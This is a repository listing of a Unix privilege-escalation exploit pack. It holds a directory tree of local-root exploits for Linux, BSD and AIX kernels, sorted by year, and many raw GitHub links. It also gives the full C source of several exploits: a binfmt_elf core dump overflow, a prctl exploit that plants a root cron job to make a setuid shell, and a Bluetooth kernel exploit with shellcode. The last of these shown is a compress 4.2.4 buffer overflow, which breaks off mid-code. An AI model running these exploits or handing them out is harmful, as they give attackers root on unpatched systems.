├── 2001 ├── 2k └── hudo.c ├── 2002 ├── 3b └── 4m ├── 2003 ├── 2-4-21 ├── 2.4.22-2003 ├── 48local ├── elflbl ├── hatorihanzo.c └── ptrace-kmod.c ├── 2004 ├── 2.6.13_17_0_2004 ├── elfcd.sh ├── kernel.c ├── mremap_pte.c └── pwned ├── 2005 ├── 2.6.13_17_2_2005 ├── 2.6.27.7- 2.6.18 2.6.24 ├── binfmt_elf.c ├── ex_gpsd.c ├── expand_stack-SMP-race.c ├── k-rad.c ├── k-rad3 ├── krad ├── krad2 └── ong_bak.c ├── 2006 ├── 2618 ├── 2.4.21-2006 ├── 2.6.13_17_3_2006 ├── 2.6.18 - 2.6.25 ├── 2.6.18-8 ├── 2.6.18.1 ├── 2.6.9-42.0.3.ELsmp ├── 2.6.x_logrotate_2031 ├── ecl-nf-snmpwn.c ├── m2 ├── prct1 ├── prct2.c ├── prct3 2.6.13.c ├── prct4 └── prct6 2.6.x.c ├── 2007 ├── 2.6.11-2007-priv8 ├── 2.6.17-2.6.24.1 ├── 2.6.18.2 ├── 2.6.22-24-2007 ├── 2.6.9-55-2007 ├── compress ├── compress_expl.c ├── gawk ├── gawk_expl.c └── w00t.so.1.0 ├── 2008 ├── 16 ├── 2008 ├── 1-2008 ├── 2.4.36.92.6.27.5 - 2008 Local root ├── 2.6.17-18-19-20-24 ├── 2.6.18-164 ├── 2.6.22 ├── 2.6.22-4-686 2008 ├── 2.6.23 ├── 2.6.23-2.6.24.c ├── 2.6.23=2008 ├── 2.6.9-67-2008 ├── 2008-4210 ├── 2008-4210.c └── CVE-2008-0009.c ├── 2009 ├── 2.4.AnD.2.6-2009 ├── 2.6.17.c ├── 2.6.18-128 ├── 2.6.18-2009.c ├── 2.6.23-2009.c ├── 2.6.28-2009.c ├── 2.6.29.c ├── 2.6.29.sh ├── 2.6.r1z.sh ├── 2009-proto_ops │ ├── exploit.c │ ├── run.c │ └── run.sh ├── 2009.6.18-164 ├── 2009.6.31_2009 ├── CVE-2009-0360 │ ├── CVE-2009-0360 │ └── CVE-2009-0360.c ├── CVE-2009-1046.c ├── CVE-2009-1185.c ├── CVE-2009-1337.sh ├── CVE-2009-1527.c ├── CVE-2009-1894 │ └── pulseaudio-exp │ │ ├── c.sh │ │ ├── config.h │ │ ├── info.txt │ │ ├── pulseaudio-exp.c │ │ └── shell.c ├── CVE-2009-2692 │ ├── 2.6.18.c │ └── CVE-2009-2692.c ├── CVE-2009-2698 │ ├── CVE-2009-2698.c │ ├── hoagie_udp_sendmsg.c │ ├── katon.c │ └── therebel │ │ ├── exploit.c │ │ ├── pwnkernel.c │ │ └── therebel.sh ├── CVE-2009-2908.c ├── CVE-2009-3547 │ ├── gayros-2.c │ └── gayros.c ├── iskorpitx ├── linux-sendpage3 │ ├── exploit-pulseaudio.c │ ├── exploit.c │ ├── run │ ├── runcon-mmap_zero │ └── 
sesearch-mmap_zero ├── r00t ├── rad-e.c └── wunderbar_emporium2 │ ├── exploit.c │ ├── exploit.so │ ├── pwnkernel │ ├── pwnkernel.c │ └── wunderbar_emporium.sh ├── 2010 ├── 2010 ├── 2.6.18 2010 ├── 2.6.18-194 2010 x86_64 ├── 2.6.18 │ ├── 15065.c │ ├── 2.6.18-194.1-2010 │ └── 2.6.18-194.17.1.el5 ├── 2.6.27 and up │ └── 2.6.27.c ├── 2.6.2x │ └── devilzc0de.cpp ├── 2.6.31-2010.c ├── 2.6.31 │ └── 2.6.31-2010.c ├── 2.6.32.c ├── 2.6.32 │ ├── 2.6.32-2010 │ └── 2.6.32-2010.c ├── 2.6.36-rc1 and down │ ├── compile2 │ ├── i-CAN-haz-MODHARDEN │ └── i-CAN-haz-MODHARDEN.c ├── 2.6.36.2 and down │ ├── 2.6.36.2 │ └── 2.6.36.2.c ├── 2.6.37 and down │ ├── full-nelson │ └── full-nelson.c ├── 2.6.xx ├── CVE-2010-0832.sh ├── CVE-2010-1146 │ └── CVE-2010-1146.py ├── CVE-2010-2961.sh ├── CVE-2010-3081 │ ├── 2010-3081.c │ └── ABftw.c ├── CVE-2010-3301 │ ├── 15023 │ └── 15023.c ├── CVE-2010-3437 │ ├── 15150 │ └── 15150.c ├── CVE-2010-3847.sh ├── CVE-2010-3856 │ ├── CVE-2010-3856.sh │ ├── DSO_libmemusage.sh │ ├── glibc_libmemusage.so.sh │ ├── glibc_libpcprofile.so.sh │ ├── glibc_nondebian.sh │ ├── libmemusage.sh │ ├── libpcprofile.sh │ ├── raptor_ldaudit.sh │ └── raptor_ldaudit2.sh ├── CVE-2010-3904 │ ├── 15285 │ ├── 15285.c │ ├── linux-rds-exploit │ └── linux-rds-exploit.c ├── CVE-2010-4077, 2.6.37 │ └── CVE-2010-4077.c ├── CVE-2010-4170.sh ├── CVE-2010-4347 │ ├── american-sign-language │ └── american-sign-language.c ├── abi.c ├── ia32syscall └── x86_84.c ├── 2011 ├── 2.6.18-274 │ └── 2.6.18-274-2011 ├── 2.6.18-6-x86 │ └── 2.6.18-6-x86-2011 ├── 2.6.18.c ├── 2.6.18_2011.c ├── 2.6.28 and down │ └── alpha-omega.c ├── 2.6.28 │ └── 2.6.28-2011 ├── 2.6.32-46 │ └── 2-6-32-46-2011 ├── 2.6.33 │ └── 2.6.33-2011 ├── 2.6.34 and up │ ├── caps-to-root.c │ └── caps-to-root2.c ├── 2.6.34 │ ├── 2.6.34-2011 │ └── 2.6.34-2011Exploit2 ├── 2.6.37-rc2.c ├── 3.0.c ├── 6.4-2011 ├── CVE-2011-1485 │ ├── 17942.c │ ├── CVE-2011-1485.sh │ └── polkit-pwnage.c ├── CVE-2011-2777.sh ├── CVE-2011-4124 │ ├── cali.sh │ ├── 
calib.sh │ ├── calibe.sh │ ├── caliber.sh │ └── shadow ├── CVE-2012-0809 │ ├── death-star │ └── death-star.c └── z1d-2011 ├── 2012 ├── 3 ├── 4 ├── 5 ├── 7 ├── 8 ├── 9 ├── 10 ├── 11 ├── 14 ├── 18 ├── 31 ├── 44 ├── 89 ├── 99 ├── 15150 ├── 15200 ├── 0977 ├── 13x ├── 16-1 ├── 18-5 ├── 2-1 ├── 2-6-37 ├── 2.6.17_2.6.24 ├── 2.6.18-2.6.24-2.6.20-2.6.22-2.6.21.c ├── 2.6.18-374.12.1.el5-2012 ├── 2.6.18.1 ├── 2.6.18 │ ├── v1-2.6.18.2012.c │ └── v2-2.6.18-238.c ├── 2.6.32.279..2012.out ├── 2.6.33 ├── 2.6.37 ├── 2.6.37-rc2 ├── 2.6.39 and up │ ├── mempodipper │ └── mempodipper.c ├── 36-rc1 ├── 7-2 ├── 7x ├── CVE-2012-0946 │ ├── 2012-0946.c │ └── CVE-2012-0946 ├── CVE-2012-3524 │ ├── dd │ ├── dd.c │ ├── dzug │ └── dzug.c ├── a.out ├── acid ├── exp1 ├── exploit ├── full-nelson ├── gayros ├── krad313 ├── local-root-exploit-gayros ├── pwnkernel ├── root1 ├── runx ├── tivoli ├── ubuntu └── vmsplice-local-root-exploit ├── 2013 ├── 2.6.17.4_2013 ├── 2.6.18 ├── 2.6.32-2013 ├── 2.6.32-46.1.BHsmp ├── 2.6.37 to 3.x.x │ ├── perf_ptmx.c │ └── semtex.c ├── 3.3 to 3.7 │ ├── archer │ └── archer.c ├── 3.6,3.8.9-2013.c ├── 3.8.0 │ ├── clown-newuser.c │ └── userns_root_exploit.c ├── 3.8.9 and down │ ├── perf_swevent_init │ └── perf_swevent_init.c ├── CVE-2013-1763.c ├── CVE-2013-2094-Ubuntu-12.c └── enlightenment │ ├── exp_abacus.c │ ├── exp_cheddarbay.c │ ├── exp_framework.h │ ├── exp_ingom0wnar.c │ ├── exp_moosecox.c │ ├── exp_paokara.c │ ├── exp_powerglove.c │ ├── exp_sieve.c │ ├── exp_therebel.c │ ├── exp_vmware.c │ ├── exp_wunderbar.c │ ├── exploit.c │ ├── funny.jpg │ ├── pwnkernel.c │ ├── run_nonnull_exploits.sh │ └── run_null_exploits.sh ├── 2014 ├── 1-2 ├── 2.6.18.371 2014.c ├── 3.15-rc4 and down │ └── CVE-2014-0196.c ├── 3.4 and up │ ├── recvmmsg │ ├── recvmmsg.c │ ├── timeoutpwn │ └── timeoutpwn.c ├── 3.4+.c ├── CVE-2014-3153.c ├── CVE-2014-4014-setgid.c ├── CVE-2014-4699.c ├── CVE-2014-5284.py ├── ekit │ ├── include │ │ └── hdr.txt │ ├── ret2dir │ │ ├── kernwrite_amd64 │ │ ├── 
kernwrite_amd64-pax │ │ ├── kernwrite_amd64.c │ │ ├── perf-events_amd64 │ │ ├── perf-events_amd64.c │ │ ├── rds_amd64-pax │ │ ├── rds_amd64.c │ │ ├── shellcode.h │ │ ├── sock-diag_amd64 │ │ └── sock-diag_amd64.c │ ├── ret2usr │ │ ├── kernwrite_amd64 │ │ ├── kernwrite_amd64.c │ │ ├── perf-events_amd64 │ │ ├── perf-events_amd64.c │ │ ├── rds_amd64 │ │ ├── rds_amd64.c │ │ ├── shellcode.h │ │ ├── sock-diag_amd64 │ │ └── sock-diag_amd64.c │ ├── runme │ └── utils │ │ ├── kernwrite-pax │ │ ├── Makefile │ │ ├── Module.symvers │ │ ├── VERSION │ │ ├── kernwrite.c │ │ ├── kernwrite.ko │ │ ├── kernwrite.mod.c │ │ ├── kernwrite.mod.o │ │ ├── kernwrite.o │ │ └── modules.order │ │ ├── kernwrite │ │ ├── Makefile │ │ ├── Module.symvers │ │ ├── VERSION │ │ ├── kernwrite.c │ │ ├── kernwrite.ko │ │ ├── kernwrite.mod.c │ │ ├── kernwrite.mod.o │ │ ├── kernwrite.o │ │ └── modules.order │ │ └── load_kernwrite.c ├── local.c └── seccomp-exp │ ├── Makefile │ ├── hu.c │ └── seccomp-bpf.h ├── BSD ├── 2005 │ └── FreeBSDmaster.passwd.c ├── 2008 │ ├── CVE-2008-5736 .c │ ├── CVE-2008-5736.c │ └── cve-2008-3531.c ├── 2009 │ ├── 2009-3527.c │ ├── 2009-4146.sh │ └── FreeBSD_7.2.c ├── 2010 │ ├── 2010-2020 │ │ ├── nfs_mount_ex │ │ └── nfs_mount_ex.c │ ├── 2010-4210.c │ └── CVE-2010-2693 │ │ ├── 14688.c │ │ └── cve-2010-2693.c ├── 2011 │ ├── 2011-4062.sh │ ├── 2011-4862.c │ ├── 8.1 │ │ └── bsd.pl │ ├── CVE-2011-4062 │ │ ├── memvisor.tgz │ │ └── sploit.tgz │ └── CVE-2011-4122.sh ├── 2012 │ └── CVE-2012-0217 (FreeBSD 8.3 - 9.0 amd64 privesc ) │ │ ├── 22222.c │ │ └── CVE-2012-0217.c └── 2013 │ ├── 9.0-9.1 │ ├── cve-2013-2171 │ └── cve-2013-2171.c │ └── 9.0 │ ├── 9.0 │ └── FreeBSD_9.0.c ├── IBM_AIX └── 2013 │ └── aix-r00t.sh └── README.md /2001/2k: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2001/2k 
-------------------------------------------------------------------------------- /2002/3b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2002/3b -------------------------------------------------------------------------------- /2002/4m: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2002/4m -------------------------------------------------------------------------------- /2003/2-4-21: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/2-4-21 -------------------------------------------------------------------------------- /2003/2.4.22-2003: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/2.4.22-2003 -------------------------------------------------------------------------------- /2003/48local: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/48local -------------------------------------------------------------------------------- /2003/elflbl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2003/elflbl -------------------------------------------------------------------------------- /2004/2.6.13_17_0_2004: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2004/2.6.13_17_0_2004 -------------------------------------------------------------------------------- /2004/pwned: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2004/pwned -------------------------------------------------------------------------------- /2005/2.6.13_17_2_2005: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/2.6.13_17_2_2005 -------------------------------------------------------------------------------- /2005/2.6.27.7- 2.6.18 2.6.24: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/2.6.27.7- 2.6.18 2.6.24 -------------------------------------------------------------------------------- /2005/binfmt_elf.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Linux binfmt_elf core dump buffer overflow 3 | * 4 | * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. 5 | * 6 | * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" 7 | * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION 8 | * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. 
9 | * 10 | */ 11 | // phase 1 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include 18 | #include 19 | 20 | #include 21 | 22 | 23 | static char *env[10], *argv[4]; 24 | static char page[PAGE_SIZE]; 25 | static char buf[PAGE_SIZE]; 26 | 27 | 28 | void fatal(const char *msg) 29 | { 30 | if(!errno) { 31 | fprintf(stderr, "\nFATAL: %s\n", msg); 32 | } 33 | else { 34 | printf("\n"); 35 | perror(msg); 36 | } 37 | fflush(stdout); fflush(stderr); 38 | _exit(129); 39 | } 40 | 41 | 42 | int main(int ac, char **av) 43 | { 44 | int esp, i, r; 45 | struct rlimit rl; 46 | 47 | __asm__("movl %%esp, %0" : : "m"(esp)); 48 | printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], 49 | av[ac-1]+strlen(av[ac-1]), esp); 50 | rl.rlim_cur = RLIM_INFINITY; 51 | rl.rlim_max = RLIM_INFINITY; 52 | r = setrlimit(RLIMIT_CORE, &rl); 53 | if(r) fatal("setrlimit"); 54 | 55 | memset(env, 0, sizeof(env) ); 56 | memset(argv, 0, sizeof(argv) ); 57 | memset(page, 'A', sizeof(page) ); 58 | page[PAGE_SIZE-1]=0; 59 | 60 | // move up env & exec phase 2 61 | if(!strcmp(av[0], "AAAA")) { 62 | printf("\n[+] phase 2, to crash "); fflush(stdout); 63 | argv[0] = "elfcd2"; 64 | argv[1] = page; 65 | 66 | // term 0 counts! 
67 | memset(buf, 0, sizeof(buf) ); 68 | for(i=0; i<789 + 4; i++) 69 | buf[i] = 'C'; 70 | argv[2] = buf; 71 | execve(argv[0], argv, env); 72 | _exit(127); 73 | } 74 | 75 | // move down env & reexec 76 | for(i=0; i<9; i++) 77 | env[i] = page; 78 | 79 | argv[0] = "AAAA"; 80 | printf("\n[+] phase 1"); fflush(stdout); 81 | execve(av[0], argv, env); 82 | 83 | return 0; 84 | } -------------------------------------------------------------------------------- /2005/k-rad3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/k-rad3 -------------------------------------------------------------------------------- /2005/krad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/krad -------------------------------------------------------------------------------- /2005/krad2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2005/krad2 -------------------------------------------------------------------------------- /2006/2.4.21-2006: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.4.21-2006 -------------------------------------------------------------------------------- /2006/2.6.13_17_3_2006: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.13_17_3_2006 
-------------------------------------------------------------------------------- /2006/2.6.18 - 2.6.25: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18 - 2.6.25 -------------------------------------------------------------------------------- /2006/2.6.18-8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18-8 -------------------------------------------------------------------------------- /2006/2.6.18.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.18.1 -------------------------------------------------------------------------------- /2006/2.6.9-42.0.3.ELsmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.9-42.0.3.ELsmp -------------------------------------------------------------------------------- /2006/2.6.x_logrotate_2031: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2.6.x_logrotate_2031 -------------------------------------------------------------------------------- /2006/2618: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/2618 
-------------------------------------------------------------------------------- /2006/m2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/m2 -------------------------------------------------------------------------------- /2006/prct1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/prct1 -------------------------------------------------------------------------------- /2006/prct3 2.6.13.c: -------------------------------------------------------------------------------- 1 | /* Linux >= 2.6.13 prctl kernel exploit 2 | * 3 | * (C) Julien TINNES 4 | * 5 | * If you read the Changelog from 2.6.13 you've probably seen: 6 | * [PATCH] setuid core dump 7 | * 8 | * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, 9 | * user setable argument to PR_SET_DUMPABLE. 10 | * 11 | * This flaw allows us to create a root owned coredump into any directory. 12 | * This is trivially exploitable. 
13 | * 14 | */ 15 | 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | 27 | #define CROND "/etc/cron.d" 28 | #define BUFSIZE 2048 29 | 30 | 31 | struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; 32 | 33 | char crontemplate[]= 34 | "#/etc/cron.d/core suid_dumpable exploit\n" 35 | "SHELL=/bin/sh\n" 36 | "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" 37 | "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; 38 | 39 | char cronstring[BUFSIZE]; 40 | char fname[BUFSIZE]; 41 | 42 | struct timeval te; 43 | 44 | void sh(int sn) { 45 | execl(fname, fname, (char *) NULL); 46 | } 47 | 48 | 49 | int main(int argc, char *argv[]) { 50 | 51 | int nw, pid; 52 | 53 | if (geteuid() == 0) { 54 | printf("[+] getting root shell\n"); 55 | setuid(0); 56 | setgid(0); 57 | if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { 58 | perror("[-] execle"); 59 | return 1; 60 | } 61 | } 62 | 63 | printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); 64 | 65 | /* get our file name */ 66 | if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { 67 | perror("[-] readlink"); 68 | printf("This is not fatal, rewrite the exploit\n"); 69 | } 70 | 71 | if (signal(SIGUSR1, sh) == SIG_ERR) { 72 | perror("[-] signal"); 73 | return 1; 74 | } 75 | printf("[+] Installed signal handler\n"); 76 | 77 | /* Let us create core files */ 78 | setrlimit(RLIMIT_CORE, &myrlimit); 79 | if (chdir(CROND) == -1) { 80 | perror("[-] chdir"); 81 | return 1; 82 | } 83 | 84 | /* exploit the flaw */ 85 | if (prctl(PR_SET_DUMPABLE, 2) == -1) { 86 | perror("[-] prtctl"); 87 | printf("Is you kernel version >= 2.6.13 ?\n"); 88 | return 1; 89 | } 90 | 91 | printf("[+] We are suidsafe dumpable!\n"); 92 | 93 | /* Forge the string for our core dump */ 94 | nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); 95 | if (nw >= 
sizeof(cronstring)) { 96 | printf("[-] cronstring is too small\n"); 97 | return 1; 98 | } 99 | printf("[+] Malicious string forged\n"); 100 | 101 | if ((pid=fork()) == -1) { 102 | perror("[-] fork"); 103 | return 1; 104 | } 105 | 106 | if (pid == 0) { 107 | /* This is not the good way to do it ;) */ 108 | sleep(120); 109 | exit(0); 110 | } 111 | 112 | /* SEGFAULT the child */ 113 | printf("[+] Segfaulting child\n"); 114 | if (kill(pid, 11) == -1) { 115 | perror("[-] kill"); 116 | return 1; 117 | } 118 | if (gettimeofday(&te, NULL) == 0) 119 | printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); 120 | sleep(120); 121 | 122 | printf("[-] It looks like the exploit failed\n"); 123 | 124 | return 1; 125 | } 126 | 127 | // milw0rm.com [2006-07-12] 128 | 129 | -------------------------------------------------------------------------------- /2006/prct4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2006/prct4 -------------------------------------------------------------------------------- /2007/2.6.11-2007-priv8: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #define KERNEL_SPACE_MEMORY_BRUTE_START 0xc0000000 12 | #define KERNEL_SPACE_MEMORY_BRUTE_END 0xffffffff 13 | #define KERNEL_SPACE_BUFFER 0x100000 14 | 15 | 16 | char asmcode[] = /*Global shellcode*/ 17 | 18 | "\xb8\x00\xf0\xff\xff\x31\xc9\x21\xe0\x8b\x10\x89\x8a" 19 | "\x80\x01\x00\x00\x31\xc9\x89\x8a\x7c\x01\x00\x00\x8b" 20 | "\x00\x31\xc9\x31\xd2\x89\x88\x90\x01\x00\x00\x89\x90" 21 | "\x8c\x01\x00\x00\xb8\xff\xff\xff\xff\xc3"; 22 | 23 | 24 | 25 | struct net_proto_family { 26 | int family; 27 | int (*create) (int *sock, int protocol); 28 | short authentication; 29 | 
short encryption; 30 | short encrypt_net; 31 | int *owner; 32 | }; 33 | 34 | 35 | int check_zombie_child(int status,pid_t pid) 36 | { 37 | waitpid(pid,&status,0); 38 | if(WIFEXITED(status)) 39 | { 40 | if(WEXITSTATUS(status) != 0xFF) 41 | exit(-1); 42 | } 43 | else if (WIFSIGNALED(status)) 44 | { 45 | printf("KERNEL Oops. Exit Code = %d.(%s)\n",WTERMSIG(status),strsignal(WTERMSIG(status))); 46 | return(WTERMSIG(status)); 47 | } 48 | } 49 | 50 | 51 | int brute_socket_create (int negative_proto_number) 52 | { 53 | socket(AF_BLUETOOTH,SOCK_RAW, negative_proto_number); /* overflowing proto number with negative 32bit value */ 54 | int i; 55 | i = geteuid(); 56 | printf("Checking the Effective user id after overflow : UID = %d\n",i); 57 | if(i) 58 | exit(EXIT_FAILURE); 59 | printf("0wnage D0ne bro.\n"); 60 | execl("/bin/sh","sh",NULL); 61 | exit(EXIT_SUCCESS); 62 | } 63 | 64 | 65 | int main(void) 66 | { 67 | 68 | pid_t pid; 69 | int counter; 70 | int status; 71 | int *kernel_return; 72 | 73 | char kernel_buffer[KERNEL_SPACE_BUFFER]; 74 | unsigned int brute_start; 75 | unsigned int where_kernel; 76 | 77 | struct net_proto_family *bluetooth; 78 | 79 | bluetooth = (struct net_proto_family *) malloc(sizeof(struct net_proto_family)); 80 | bzero(bluetooth,sizeof(struct net_proto_family)); 81 | 82 | bluetooth->family = AF_BLUETOOTH; 83 | bluetooth->authentication = 0x0; /* No Authentication */ 84 | bluetooth->encryption = 0x0; /* No Encryption */ 85 | bluetooth->encrypt_net = 0x0; /* No Encrypt_net */ 86 | bluetooth->owner = 0x0; /* No fucking owner */ 87 | bluetooth->create = (int *) asmcode; 88 | 89 | 90 | 91 | kernel_return = (int *) kernel_buffer; 92 | 93 | for( counter = 0; counter < KERNEL_SPACE_BUFFER; counter+=4, kernel_return++) 94 | *kernel_return = (int)bluetooth; 95 | 96 | brute_start = KERNEL_SPACE_MEMORY_BRUTE_START; 97 | printf("Bluetooth stack local root exploit\n"); 98 | printf("http://backdoored/net"); 99 | 100 | while ( brute_start < 
KERNEL_SPACE_MEMORY_BRUTE_END ) 101 | { 102 | where_kernel = (brute_start - (unsigned int)&kernel_buffer) / 0x4 ; 103 | where_kernel = -where_kernel; 104 | 105 | pid = fork(); 106 | if(pid == 0 ) 107 | brute_socket_create(where_kernel); 108 | check_zombie_child(status,pid); 109 | brute_start += KERNEL_SPACE_BUFFER; 110 | fflush(stdout); 111 | } 112 | return 0; 113 | } -------------------------------------------------------------------------------- /2007/2.6.17-2.6.24.1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.17-2.6.24.1 -------------------------------------------------------------------------------- /2007/2.6.18.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.18.2 -------------------------------------------------------------------------------- /2007/2.6.22-24-2007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.22-24-2007 -------------------------------------------------------------------------------- /2007/2.6.9-55-2007: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/2.6.9-55-2007 -------------------------------------------------------------------------------- /2007/compress: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2007/compress 
-------------------------------------------------------------------------------- /2007/compress_expl.c: -------------------------------------------------------------------------------- 1 | /* Compress v4.2.4 local test exploit */ 2 | /* */ 3 | /* Yields no extra privileges. For more information please read */ 4 | /* our advisory. */ 5 | /* */ 6 | /* (C) NETRIC SECURITY TEAM - 2002 */ 7 | 8 | #include 9 | #include 10 | 11 | #define NOP 0x90 12 | #define BSIZE 1032 // Replace for 1173 when using SuSE 13 | #define EGGSIZE 2048 14 | 15 | char *shellcode = 16 | "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" 17 | "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" 18 | "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 19 | 20 | 21 | int main(int argc, char **argv) { 22 | char *buffer, *pointer, *egg; 23 | int bsize = BSIZE, c, offset = 0; 24 | long addr, *addr_pointer; 25 | int get_sp = (int)&get_sp; 26 | 27 | if (argc > 1) offset = atoi(argv[1]); 28 | if (argc > 2) bsize = atoi(argv[2]); 29 | 30 | if(!(buffer = malloc(bsize))) { 31 | fprintf(stderr, "Memory not allocated!\n"); 32 | exit(1); 33 | } 34 | 35 | if(!(egg = malloc(EGGSIZE))) { 36 | fprintf(stderr, "Memory not allocated!\n"); 37 | exit(1); 38 | } 39 | 40 | 41 | addr = get_sp + offset; 42 | pointer = buffer; 43 | addr_pointer = (long *) pointer; 44 | 45 | printf("-> Compress 4.2.4 local exploit\n"); 46 | printf("Using return adress: 0x%x\n", addr); 47 | printf("Buffersize: %d\n", bsize); 48 | printf("Offset: %d\n", offset); 49 | 50 | for(c = 0; c < bsize; c+=4) 51 | *(addr_pointer++) = addr; 52 | 53 | pointer = egg; 54 | 55 | for(c = 0; c < 